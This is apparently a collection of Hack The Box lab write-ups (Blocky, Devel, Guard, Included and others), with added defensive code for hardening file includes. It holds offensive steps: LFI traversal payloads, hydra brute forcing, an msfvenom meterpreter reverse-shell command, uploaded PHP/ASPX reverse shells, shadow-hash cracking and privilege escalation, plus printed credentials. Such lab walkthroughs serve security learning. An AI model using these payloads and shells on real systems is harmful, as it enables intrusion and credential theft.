uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
```

## Post Exploitation

We can now obtain the root flag:

```
[root@beep ~]# cat root.txt
78284bce7c9d0b21378ac5bd69ee89c9
```
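Looking back at the `module_name` include that the LFI above abused, here is how such a parameter can be resolved safely (an added example, not vTiger's code; the module directory, the allowlist and the sample module file are constructed so that it runs offline):

```php
<?php
// Added example, not vTiger's own code: a hardened resolver for a
// "module_name" style include like the one abused via sortfieldsjson.php.
// The module directory, module names and file layout are constructed here.

/**
 * Map a user-supplied module name to the file that may be included.
 * Returns the absolute path, or null when the request must be rejected.
 * Each check corresponds to one step of the attack shown in the write-up.
 */
function resolve_module_file(string $modulesDir, array $allowed, string $name): ?string
{
    // 1. Null bytes: "%00" decodes to "\0". PHP before 5.3.4 treated it as the
    //    end of the path, cutting off whatever suffix the script appended;
    //    newer PHP refuses such paths, but do not rely on the runtime for that.
    if (strpos($name, "\0") !== false) {
        return null;
    }
    // 2. Allowlist: the parameter names one of our modules, nothing else.
    //    This alone stops "../../etc/passwd" and "/var/mail/asterisk".
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    // 3. Containment: even an allowlisted name must resolve to a file below
    //    the module directory (guards against symlinks and future mistakes).
    $base = realpath($modulesDir);
    $real = realpath($modulesDir . '/' . $name . '/sortfields.php');
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Build a throwaway module tree so the legitimate case resolves offline.
$modulesDir = sys_get_temp_dir() . '/vtiger_modules_demo';
@mkdir($modulesDir . '/Accounts', 0700, true);
file_put_contents($modulesDir . '/Accounts/sortfields.php', "<?php // demo module\n");
$allowed = ['Accounts', 'Contacts', 'Leads'];   // constructed allowlist

// Constructed inputs: the two payloads from the write-up, URL-decoded the way
// PHP fills $_GET, followed by a legitimate module name.
$inputs = [
    urldecode('../../../../../../../../etc/passwd%00'),
    urldecode('../../../../../../../../var/mail/asterisk%00'),
    'Accounts',
];
foreach ($inputs as $name) {
    $file = resolve_module_file($modulesDir, $allowed, $name);
    printf("%-50s -> %s\n", addcslashes($name, "\0"), $file ?? 'rejected');
}
```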
--------------------------------------------------------------------------------
/Blocky/README.md:
--------------------------------------------------------------------------------
![](pics/logo.png)

# Blocky (Linux)

## Enumeration

```
rustscan --ulimit 5000 10.129.1.53 -- -sC -sV -o port_scan

PORT      STATE SERVICE   REASON  VERSION
21/tcp    open  ftp?      syn-ack
22/tcp    open  ssh       syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXqVh031OUgTdcXsDwffHKL6T9f1GfJ1/x/b/dywX42sDZ5m1Hz46bKmbnWa0YD3LSRkStJDtyNXptzmEp31Fs2DUndVKui3LCcyKXY6FSVWp9ZDBzlW3aY8qa+y339OS3gp3aq277zYDnnA62U7rIltYp91u5VPBKi3DITVaSgzA8mcpHRr30e3cEGaLCxty58U2/lyCnx3I0Lh5rEbipQ1G7Cr6NMgmGtW6LrlJRQiWA1OK2/tDZbLhwtkjB82pjI/0T2gpA/vlZJH0elbMXW40Et6bOs2oK/V2bVozpoRyoQuts8zcRmCViVs8B3p7T1Qh/Z+7Ki91vgicfy4fl
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNgEpgEZGGbtm5suOAio9ut2hOQYLN39Uhni8i4E/Wdir1gHxDCLMoNPQXDOnEUO1QQVbioUUMgFRAXYLhilNF8=
|   256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILqVrP5vDD4MdQ2v3ozqDPxG1XXZOp5VPpVsFUROL6Vj
80/tcp    open  http      syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
25565/tcp open  minecraft syn-ack Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## Examine Port 21 - FTP (???)

On Port 21 we have a service running which seems to be FTP. However, nmap already marks it as "?", as it apparently is not FTP.
To make sure, we use the ftp client and connect to the port:

```
└──╼ $ ftp 10.129.1.53
Connected to 10.129.1.53.
```

After roughly 20 seconds without receiving any output, it shows us the following:

```
220 ProFTPD 1.3.5a Server (Debian) [::ffff:10.129.1.53]
Name (10.129.1.53:ctf):
```

This is already quite strange. But at this point I simply assumed it's some network issue. So I tried logging in as `Anonymous`, as this usually works on most vulnerable systems, but it does not work here. As we do not have any further credentials that we could try, we have to skip FTP for now and proceed with the Apache Server.

## Examine Port 80 - Apache Server

![](pics/website.png)

On Port 80, we see some Minecraft-themed web application that was apparently developed with WordPress (visible at the bottom of the website).

By running gobuster, we can confirm that this is indeed a WordPress application, as it contains all the common directories, such as wp-admin:

```
└──╼ $ gobuster dir -u "10.129.1.53" -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.129.1.53
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/01/18 18:17:57 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/javascript (Status: 301)
/phpmyadmin (Status: 301)
/plugins (Status: 301)
/server-status (Status: 403)
/wiki (Status: 301)
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-includes (Status: 301)
```

But it also contains some other directories such as `/wiki` and `/plugins`. We will check them out later. For now we just click through the pages and search for useful information. One of the recent posts was written by `Notch`. Maybe this is a valid username for the wp-admin login. Let's try it.

![](pics/wordpress_feedback.png)

And indeed! It exists. Let's see if Notch has a weak password.

For that, we first have to intercept the login POST request with Burp Suite, to see the required parameters:

```
log=notch&pwd=test&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.129.1.53%2Fwp-admin%2F&testcookie=1
```

Now we can use a tool like hydra to bruteforce the password of Notch:

```
hydra -l notch -P /usr/share/wordlists/rockyou.txt 10.129.1.53 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.129.1.53%2Fwp-admin%2F&testcookie=1:F=incorrect" -vvv -f
```

However, this led to nothing. Apparently, the password of notch is quite strong, and guessing it is probably not the intended way to pwn the machine.

Let's see what's in the other directories.

In `/wiki` we only see an "Under Construction" message:

```
Under Construction

Please check back later! We will start publishing wiki articles after we have finished the main server plugin!

The new core plugin will store your playtime and other information in our database, so you can see your own stats!
```

But we should probably check out the plugins, as the wiki is hinting towards it.

![](pics/plugins.png)

Here we can see 2 jar files, `BlockyCore.jar` and `griefprevention...jar`. Let's download them to our local machine and inspect them.
Jar files can be unpacked by running the following command:

```
jar -xf BlockyCore.jar
```

This gives us its content, namely the directory `com`. Inside the directory, we find a class file `BlockyCore.class`. To inspect its Java bytecode, we can run:

```
javap -c BlockyCore

Warning: File ./BlockyCore.class does not contain class BlockyCore
Compiled from "BlockyCore.java"
public class com.myfirstplugin.BlockyCore {
  public java.lang.String sqlHost;

  public java.lang.String sqlUser;

  public java.lang.String sqlPass;

  public com.myfirstplugin.BlockyCore();
    Code:
       0: aload_0
       1: invokespecial #12                 // Method java/lang/Object."":()V
       4: aload_0
       5: ldc           #14                 // String localhost
       7: putfield      #16                 // Field sqlHost:Ljava/lang/String;
      10: aload_0
      11: ldc           #18                 // String root
      13: putfield      #20                 // Field sqlUser:Ljava/lang/String;
      16: aload_0
      17: ldc           #22                 // String 8YsqfCTnvxAUeduzjNSXe22
      19: putfield      #24                 // Field sqlPass:Ljava/lang/String;
      22: return

  public void onServerStart();
    Code:
       0: return

  public void onServerStop();
    Code:
       0: return

  public void onPlayerJoin();
    Code:
       0: aload_0
       1: ldc           #33                 // String TODO get username
       3: ldc           #35                 // String Welcome to the BlockyCraft!!!!!!!
       5: invokevirtual #37                 // Method sendMessage:(Ljava/lang/String;Ljava/lang/String;)V
       8: return

  public void sendMessage(java.lang.String, java.lang.String);
    Code:
       0: return
}
```

It contains some quite interesting comments!

```
// String root
// Field sqlUser

// String 8YsqfCTnvxAUeduzjNSXe22
// Field sqlPass
```

So apparently `root:8YsqfCTnvxAUeduzjNSXe22` are the credentials for the root SQL user. So how can we use them?
During our enumeration, we found a `phpmyadmin` directory, in which we can probably use the credentials to access the databases!

![](pics/phpmyadmin_login.png)

And it works! We now have access to the databases.

![](pics/phpmyadmin.png)

Inspecting the database `wordpress`, we see a table called `wp_users`.

![](pics/notch_credentials.png)

It contains the password hash of the user notch: `$P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/`

Some research reveals that CMSs like WordPress or Drupal use the portable PHP password hashing framework `phpass` (https://www.openwall.com/phpass/). We could try to bruteforce it, but as we are root, we can simply create our own hash of a known password and insert it into the database. For this, I used the following website:
http://scriptserver.mainframe8.com/wordpress_password_hasher.php

Now we can login as Notch!

![](pics/wp_admin_login.png)

## Gaining an Initial Foothold

For obtaining a reverse shell we have several options. I've decided to inject a PHP reverse shell into the themes as follows:

![](pics/themes_editor.png)

Now when loading this file by accessing it via the browser:

```
http://10.129.1.53/wp-content/themes/twentyseventeen/404.php
```

we receive a reverse shell!

![](pics/reverse_shell.png)

## Privilege Escalation

We know that user `notch` exists. Let's examine his home directory.

```
drwxrwxr-x 7 notch notch 4096 Jul  2  2017 minecraft
-r-------- 1 notch notch   32 Jul  2  2017 user.txt
```

Unfortunately, we do not have enough permissions to read the user.txt. Also the investigation of the minecraft directory in the home directory led to nothing.
After another hour of trying some stuff and being frustrated, I decided to try the SQL root password as the password for notch, as he seems to be the only user on the system. Maybe he has used the same password for multiple services. And indeed. Huge facepalm at this moment.

From here it's rather easy, as notch is on the sudoers list:

```
notch@Blocky:/var/www$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
```

So we simply run `sudo /bin/sh` or `su -` and we obtain the root shell!

```
root@Blocky:~# id
uid=0(root) gid=0(root) groups=0(root)
```
--------------------------------------------------------------------------------
/Devel/README.md:
--------------------------------------------------------------------------------
![](pics/logo.png)

# Devel (Windows)

## Enumeration

```
rustscan 10.129.79.250 -- -Pn -sC -sV -o port_scan

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM                 aspnet_client
| 03-17-17  04:37PM              689 iisstart.htm
|_03-17-17  04:37PM           184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    syn-ack Microsoft IIS httpd 7.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

The machine has an open FTP port (which allows Anonymous login) as well as a webservice running on Port 80.

### Examine Port 21 - Anonymous FTP login

```
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM                 aspnet_client
03-17-17  04:37PM              689 iisstart.htm
03-17-17  04:37PM           184946 welcome.png
226 Transfer complete.
```

We can follow the `aspnet_client` path until `"/aspnet_client/system_web/2_0_50727"`. However, there are no interesting files.
Let's see what's on the webserver.

### Examine Port 80 - Microsoft IIS (Internet Information Service)

![](pics/welcome.png)

Inspecting the open Port 80, we only see a website containing a welcome picture. This is already very suspicious, as we have seen such a welcome png on the FTP server. Maybe they are even the same. Let's check if the directory `aspnet_client` exists.

```
gobuster dir -u "http://10.129.79.250" -w /usr/share/wordlists/dirb/big.txt

/aspnet_client (Status: 301)
```

It does! So it seems like the FTP server contains all the files that are hosted on the webserver. Maybe we have write permissions to the directory via the Anonymous FTP user. If so, we can upload a simple reverse shell script and access it via the browser.

## Exploitation

As Windows servers mostly support `ASP.NET`, I decided to upload an ASPX reverse shell. Credits to `borjmz` (https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx) for the aspx reverse shell code.

With the FTP client I created a directory `test` in the root directory and uploaded the reverse shell ASPX file into it. Afterwards I accessed the file via the browser.

![](pics/reverse_shell.png)

Now it's time for privilege escalation. This [github repository](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) lists many options about how to exploit the Windows environment.

However, none of them works. That's when I decided to switch to metasploit. Maybe it does offer us some ways.

(At this point my machine crashed and I had to reset it.
Therefore for the rest of the writeup it also has a new IP address: 10.129.80.0 instead of 10.129.79.250)

First we have to create a meterpreter reverse shell. We can use msfvenom for that.

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.50 LPORT=4444 -a x86 -f aspx > shell.aspx
```

Then we again upload this file via FTP.

Before accessing the file via the browser, we first have to set up our metasploit listener:

![](pics/metasploit.png)

Now run the listener and open the uploaded shell via the browser. You will receive a meterpreter session as result:

![](pics/meterpreter.png)

As we've already tested the user's privileges with the manual shell, we can skip this part and directly move to the privilege escalation part. We can use a metasploit module called `local_exploit_suggester` to check which modules can be used to gain a system shell.

Therefore, first put the current meterpreter session into the background and execute the following:

![](pics/privilege_escalation.png)

It provides us with many exploit suggestions that we can try:

![](pics/suggester.png)

Let's try them:

1) exploit/windows/local/bypassuac_eventvwr: Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
2) exploit/windows/local/ms10_015_kitrap0d: Works!

![](pics/system_shell.png)

Information about the exploit can be found here: https://www.exploit-db.com/exploits/11199. Apparently it's a pretty famous exploit and also very technical. So enjoy the read.
## Post Exploitation

User flag:

```
c:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8
```

Root flag:

```
c:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e621a0b5041708797c4fc4728bc72b4b
```
--------------------------------------------------------------------------------
/FindTheEasyPass/README.md:
--------------------------------------------------------------------------------
# Beginner Track - Find The Easy Pass

Description:

Find the password (say PASS) and enter the flag in the form HTB{PASS}

The first step is to download the zip and unzip it (password: hackthebox). It reveals an executable called `EasyPass.exe`. To run it you either use a Windows system or use Wine on Linux.

![](pics/easypassexe.png)

If we enter a password like `test` and press the `Check Password` button, we are notified that our password is wrong.

![](pics/wrongpassword.png)

Now that we have some information, we can open a debugger/disassembler to analyze the code. You have several options for that (IDA, Immunity, OllyDbg, Ghidra). Choose the one that you like most. I chose IDA for this task.

If you open the executable with IDA you should see something like this:

![](pics/ida.png)

As we already know that we are prompted with a "Wrong password" message once we enter a wrong password, we can search for this specific string.

![](pics/location.png)

If you are familiar with assembly, then you should directly see what's happening. Let's take a look at the graph, so that everybody sees it.

![](pics/graph.png)

So what's happening is the following:

`CALL sub_404628` (the second line from the bottom in the upper rectangle) calls a function `sub_404628`. We currently don't know what this function does, but its outcome decides whether we get a "Congratulations! Good Job" message or the "Wrong Password" one (`jnz` = jump if not zero to the "Wrong Password" part, else continue to "Good Job").

Let's take a look at the function.

![](pics/passwordfunction.png)

It's basically just comparing two values (EAX and EDX). Depending on their equality, the zero flag is set or not.

Let's set a breakpoint at the `CALL sub_404628` of the "main graph" and run the program. We can then investigate which values are in those two registers. (Shortcuts: F2 = breakpoint, F9 = start the program)

Once we reach that breakpoint (I entered the password `test`), we can take a look at the General Registers, especially RAX and RDX.

![](pics/registers.png)

Let's print the content of those registers (you can also simply hover over the registers to see the values).

![](pics/passwordcompare.png)

Our input `test` is compared to `fortran!`. Based on this comparison, we receive either the `Good Job` or the `Wrong Password` message. So `fortran!` must be the correct password.

To verify this, we can start the program again and enter `fortran!` as the password.

![](pics/gj.png)

There we go, we got the correct password!
--------------------------------------------------------------------------------
/Guard/README.md:
--------------------------------------------------------------------------------
# Starting Point - Guard

## Enumeration

```
rustscan 10.10.10.50 -- -sC -sV -o port_scans

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 2a:64:23:e0:a7:ec:1d:3b:f0:63:72:a7:d7:05:57:71 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkcOfIguCL3HiluPAL9xLs0SKg0qvvnkO6iBLb/l9rmrN2ECvvce+E8S2gyZdm4pcgOBWfCYrwVPLxvc8nvpPZPSZ1LGfW5eoGwHdklIGAMgD0QtcphvoUuYowb+ZKNoXgq3Cj3EBP49HYHuHdYTQrWkzIJxKcOKQhX6Z4ayJxVL4jwUMKSVmn9kil5LvB4rrQNA4nnhF5F2LgCLBc/3clgwf+gPep6OLq0xuIf5S0bUTKZ/1Okg6dOxcIc2P3SRYxYyhfr8lP8g4/fid2seamTv9rmE3ilQq0iBj4fnVlY5jzI5m6EOGwdM84OiXsJZmHEPDwDcqmaMhYec1U953R
|   256 b3:86:5d:3d:c9:d1:70:ea:d6:3d:36:a6:c5:f2:be:5d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMX3kqpY2ndXnsNY12RKRvy9tI69L4rrhFk1vims0B37Ju5YZ4Q5N+RV/ts7rvuKwUueCeH0AWEmE9oV3TsSG3k=
|   256 c0:5b:13:0f:d6:e6:d1:71:2d:55:e2:4a:e2:27:0e:c2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ9AJZ5v4FPferUM/c7u+T8W9N8zrGAjanwazh65aZnP
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Apparently, only the SSH port is open. As we have no other information, and previous machines have shown that information from other machines must be re-used, we can try to connect as daniel (as we have his private SSH key).

And it works! We are user `daniel`:

```
daniel@guard:~$ id
uid=1000(daniel) gid=1000(picasso) groups=1000(picasso),27(sudo)
```

## Exploitation

Having access to Daniel's home directory, we can directly read the user flag. But hmmm ... somehow `cat` does not give any output. It seems like we have some restrictions. However, `more` works perfectly fine. User flag: `209333652507f89d0d3a41ff4070c081`

Let's look for some privilege escalation!

We start by searching for files with the SUID bit set:

```
daniel@guard:~$ find / -perm -u=s -type f 2>/dev/null
-rbash: /dev/null: restricted: cannot redirect output
```

Weird! Something strange is happening with our shell. Let's investigate that.

Looking at the `/etc/passwd` file, we can see that our current user has `rbash` as default shell.

```
daniel:x:1000:1000:picasso:/home/picasso:/bin/rbash
```

As I've personally never heard of it, I must first understand what this is and do some research.

```
RBASH(1)                    General Commands Manual                   RBASH(1)

NAME
       rbash - restricted bash, see bash(1)

RESTRICTED SHELL
       If bash is started with the name rbash, or the -r option is supplied at invocation, the shell becomes restricted. A restricted shell is used to set up an environment
       more controlled than the standard shell. It behaves identically to bash with the exception that the following are disallowed or not performed:

       · changing directories with cd

       · setting or unsetting the values of SHELL, PATH, ENV, or BASH_ENV

       · specifying command names containing /

       · specifying a filename containing a / as an argument to the . builtin command

       · specifying a filename containing a slash as an argument to the -p option to the hash builtin command

       · importing function definitions from the shell environment at startup

       · parsing the value of SHELLOPTS from the shell environment at startup

       · redirecting output using the >, >|, <>, >&, &>, and >> redirection operators

       · using the exec builtin command to replace the shell with another command

       · adding or deleting builtin commands with the -f and -d options to the enable builtin command

       · using the enable builtin command to enable disabled shell builtins

       · specifying the -p option to the command builtin command

       · turning off restricted mode with set +r or set +o restricted.

       These restrictions are enforced after any startup files are read.

       When a command that is found to be a shell script is executed, rbash turns off any restrictions in the shell spawned to execute the script
```

Apparently, that is some kind of restricted shell that's highly limiting our functionality.

However, it does not prevent us from spawning a bash shell from within another program. I first tried it from within vim/vi, but it's disabled. Then I remembered a cool trick from the [OverTheWire Bandit](https://overthewire.org/wargames/bandit/) wargame. If you manage to make your terminal as small as possible and open anything with `more`, then you get the following:

![](pics/more_trick.png)

From here, you can execute commands as such:

![](pics/command_more.png)

And now we've escaped the rbash environment!

```
daniel@guard:~$ cd ..
daniel@guard:/home$ pwd
/home
daniel@guard:/home$
```

(The official writeup does it with the `man man` trick and spawns the bash from within there.)

Enumerating the system, I found some interesting backups in the `/backups` directory, namely a backup of the shadow file, for which we have read permissions.

```
root:$6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31:18334:0:99999:7:::
daniel:$6$2EEJjgy86KrZ.cbl$oCf1MzIsN7N9KziBNo7uYrHLueZLM7wySrsFYxlNtO5NVhfVsyWCSKiIURNUxOOwC0tm1kyQsiv93imCwLM0k1:18326:0:99999:7:::
```

Let's copy it to our local machine and let `john` try to crack the passwords for daniel, or in the best case for root. If we get the password for daniel, then we can at least check if he is on the sudoers list and can execute some helpful commands that we can exploit to gain root privileges.

But it's better than we thought. John is successful in cracking the root password!

```
$ john shadow -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status

password#1       (root)
```

Now we can log in as root and obtain the root flag.

Root flag: `386ca63de3e5fd7df6b6212a0430f681`
--------------------------------------------------------------------------------
/Included/README.md:
--------------------------------------------------------------------------------
# Starting Point - Included

## Enumeration

```
rustscan 10.10.10.55 -- -sC -sV -o port_scan

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.10.55/?file=index.php
```

So apparently only a single port is open. It's exposing an Apache webserver. Let's take a look at it.
### Examine Port 80 - Apache Server

![](pics/website.png)

Looking at the URL and having the name of the challenge in mind (`Included`), an experienced web penetration tester might directly think of Local File Inclusion (LFI).

And indeed! Changing the URL to
```
http://10.10.10.55/?file=../../../../../../../../etc/passwd
```
reveals the `/etc/passwd` file of the server.

![](pics/etc_passwd.png)

Now we check if we can also access `/proc/self/environ`. This file holds the initial environment of the Apache process, so the User-Agent header is likely to appear there as an environment variable. If we can access it, then we can easily create a reverse shell by injecting PHP code as e.g. the User-Agent in our request to the server (= proc environ injection). Unfortunately, we cannot access it.

Another possibility would be to access `/var/log/apache2/access.log` after we sent a request to the website with PHP code as the file parameter. The PHP code would then be executed when loading the log file (= log poisoning). However, that's also not possible. Therefore, we need another technique.

A blog article with details about the various techniques can be found [here](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1).

I was pretty much stuck at this point. So I went through all the enumeration steps again. Thereby, I noticed that `rustscan` does not support UDP port scanning at the time I'm writing this (https://github.com/RustScan/RustScan/issues/22).

Therefore, I ran the nmap scan again, but this time with a UDP scan:

```
sudo nmap -sU 10.10.10.55

PORT   STATE         SERVICE
69/udp open|filtered tftp
```

That's perfect for our LFI! We can now upload files to `/var/lib/tftpboot` (which is the default location), due to the misconfigured TFTP service, which allows new files to be created (`--create`, `-c`):

```
--create, -c
    Allow new files to be created. By default, tftpd will only allow upload of files that already exist.
    Files are created with default permissions allowing anyone to read or write them, unless the
    --permissive or --umask options are specified.
```

So now we can upload a PHP file that contains code for a reverse shell to our machine. Afterwards, we will execute the file by loading it with our LFI vulnerability.

For the PHP shell, we use the shell from Pentestmonkey (which is pretty much the standard when it comes to PHP reverse shells). We upload it with

```
tftp 10.10.10.15

put shell.php
```

Now start the listener `nc -lvnp 4444` and include the file by accessing the following page:

```
http://10.10.10.55/?file=../../../../../var/lib/tftpboot/shell.php
```

![](pics/reverse_shell.png)

## Exploitation

After several hours of research, I again had to take a look at the writeup, as I could not find any vulnerability on the system. And indeed! There is no vulnerability. The writeup simply says "The password Sheffield19 found in the previous can be used to switch to mike"... Like seriously, come on... Again one of those "we found the password in any of the previous machines for a completely unrelated user. It's obvious that you should use this password here as well". **FACEPALM** But w/e....

Now that we are user `mike`, we can look for a way to escalate our privileges. But first let's retrieve the user flag: `a56ef91d70cfbf2cdb8f454c006935a1`

Running the command `id`, we see that mike is in the group `lxc`. Following [this article](https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation) on how to obtain root privileges by abusing the `security.privileged=true` feature of lxc, we get root access.
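The `?file=` parameter above is served straight to the include, which is why both `../../../../../../../../etc/passwd` and the uploaded `/var/lib/tftpboot/shell.php` were loaded. The following is an added example, not code from the Included box or this write-up, of how such a parameter should be contained: the requested name is joined to a fixed page directory, normalised lexically, and accepted only if it still lies inside that directory. The directory `/var/www/html/pages` and the function names are assumptions for the example.

```c
/* Added example: containing an include parameter so traversal such as
 * "../../etc/passwd" cannot leave the page directory. Not from the
 * Included machine; the directory name is an assumption. */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define PATH_MAX_LEN 512

/* Lexically normalise an absolute path: collapse repeated '/', drop "."
 * segments and resolve "..". Returns false if ".." would climb above "/"
 * or the result does not fit in `out`. Symlinks are not followed here;
 * a production check would additionally realpath() the result. */
static bool normalize_path(const char *in, char *out, size_t outsz)
{
    size_t len = 0;                      /* bytes in out, excluding NUL */
    const char *p = in;
    if (outsz < 2) return false;
    out[0] = '\0';

    while (*p) {
        while (*p == '/') p++;           /* skip one or more separators */
        if (!*p) break;
        const char *start = p;
        while (*p && *p != '/') p++;
        size_t seglen = (size_t)(p - start);

        if (seglen == 1 && start[0] == '.') continue;      /* "." */
        if (seglen == 2 && start[0] == '.' && start[1] == '.') { /* ".." */
            if (len == 0) return false;  /* attempt to escape above root */
            while (len > 0 && out[len - 1] != '/') len--;
            if (len > 0) len--;          /* drop the separator as well */
            out[len] = '\0';
            continue;
        }
        if (len + 1 + seglen >= outsz) return false;
        out[len++] = '/';
        memcpy(out + len, start, seglen);
        len += seglen;
        out[len] = '\0';
    }
    if (len == 0) strcpy(out, "/");
    return true;
}

/* Resolve a user-supplied "file" parameter against pages_dir (absolute,
 * no trailing slash) and accept it only if the normalised path is still
 * inside that directory. Fills `resolved` and returns true on success. */
bool resolve_include(const char *pages_dir, const char *param,
                     char *resolved, size_t outsz)
{
    char joined[PATH_MAX_LEN];
    if (param == NULL || param[0] == '\0') return false;
    if (snprintf(joined, sizeof joined, "%s/%s", pages_dir, param)
            >= (int)sizeof joined)
        return false;
    if (!normalize_path(joined, resolved, outsz)) return false;

    /* Containment: must be pages_dir itself or start with "pages_dir/".
     * The second test stops "/pages_evil/..." from passing as a prefix. */
    size_t plen = strlen(pages_dir);
    if (strncmp(resolved, pages_dir, plen) != 0) return false;
    if (resolved[plen] != '/' && resolved[plen] != '\0') return false;
    return true;
}

int main(void)
{
    /* The two payloads shown in the write-up, plus a legitimate page. */
    const char *inputs[] = {
        "index.php",
        "../../../../../../../../etc/passwd",
        "../../../../../var/lib/tftpboot/shell.php",
    };
    char out[PATH_MAX_LEN];
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        bool ok = resolve_include("/var/www/html/pages", inputs[i], out, sizeof out);
        printf("%-45s -> %s\n", inputs[i], ok ? out : "REJECTED");
    }
    return 0;
}
```

Even with this check in place, an allowlist of page names is the simpler fix for a parameter that only ever selects one of a handful of files.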
## Post-Exploitation

In the root directory there are two files:
- root.txt: `c693d9c7499d9f572ee375d4c14c7bcf`
- login.sql: `Daniel:>SNDv*2wzLWf` (credentials for another machine)
--------------------------------------------------------------------------------
/Laboratory/README.md:
--------------------------------------------------------------------------------
![](pics/logo.png)

# Laboratory (Linux)

## Enumeration

```
rustscan --ulimit 5000 10.129.83.28 -- -sC -sV -o port_scans

PORT    STATE SERVICE  REASON  VERSION
22/tcp  open  ssh      syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     syn-ack Apache httpd 2.4.41
443/tcp open  ssl/http syn-ack Apache httpd 2.4.41 ((Ubuntu))
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kerne
```

### Examine Port 80 - Apache server

![](pics/main_website.png)

On the website itself, we can't find anything interesting. No functionality, no links. Everything is just plain text. So let's see if we can find some directories.

```
└──╼ $ gobuster dir -u "https://laboratory.htb" -w /usr/share/wordlists/dirb/big.txt -x php,html -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://laboratory.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html
[+] Timeout:        10s
===============================================================
2021/01/21 15:59:09 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
